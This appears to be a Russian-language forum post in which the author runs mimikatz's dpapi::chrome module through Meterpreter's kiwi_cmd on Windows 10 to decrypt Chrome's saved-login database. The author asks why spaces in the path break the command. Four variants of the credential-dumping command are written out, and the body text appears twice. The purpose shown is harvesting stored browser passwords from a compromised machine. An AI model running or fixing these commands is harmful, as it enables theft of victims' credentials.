Приветствую,
пробую запустить mimikatz/kiwi на win 10 64bit с модулем 'dpapi:chrome' из metterpreter-а используя функцию kiwi_cmd для сбора инфы из базы ".sqlite" Google Chrome.
И столкнулся с проблемой неправильной(как мне кажется) обработки аргумента в котором передаться путь к базе.
Первый пробел в пути к базе автоматически воспринимается mimikatz-ом как конец строки, ниже кину скрины со всеми вариантами которые я пробовал(по факту я пробовал гораздо больше)
Вариант 1:
Вариант 2:
Вариант 3:
Вариант 4:
Исходники данного модуля:
github.com
Буду благодарен за советы и идеи от людей имеющих опыт в использовании данного инструмента.
пробую запустить mimikatz/kiwi на win 10 64bit с модулем 'dpapi:chrome' из metterpreter-а используя функцию kiwi_cmd для сбора инфы из базы ".sqlite" Google Chrome.
И столкнулся с проблемой неправильной(как мне кажется) обработки аргумента в котором передаться путь к базе.
Первый пробел в пути к базе автоматически воспринимается mimikatz-ом как конец строки, ниже кину скрины со всеми вариантами которые я пробовал(по факту я пробовал гораздо больше)
Вариант 1:
Код:
kiwi_cmd "dpapi::chrome /in:'%localappdata%\\Google\\Chrome\\User Data\\Default\\Login Data' /unprotect"
Вариант 2:
Код:
kiwi_cmd "dpapi::chrome /in:\"%localappdata%\\Google\\Chrome\\User Data\\Default\\Login Data\" /unprotect"
Вариант 3:
Код:
kiwi_cmd "dpapi::chrome /in:\"%localappdata%\Google\Chrome\User Data\Default\Login Data\" /unprotect"
Вариант 4:
Код:
kiwi_cmd "dpapi::chrome /in:%localappdata%\Google\Chrome\User Data\Default\Login Data /unprotect"
Исходники данного модуля:
mimikatz/mimikatz/modules/dpapi/packages/kuhl_m_dpapi_chrome.c at master · gentilkiwi/mimikatz
A little tool to play with Windows security. Contribute to gentilkiwi/mimikatz development by creating an account on GitHub.
Буду благодарен за советы и идеи от людей имеющих опыт в использовании данного инструмента.
Последнее редактирование: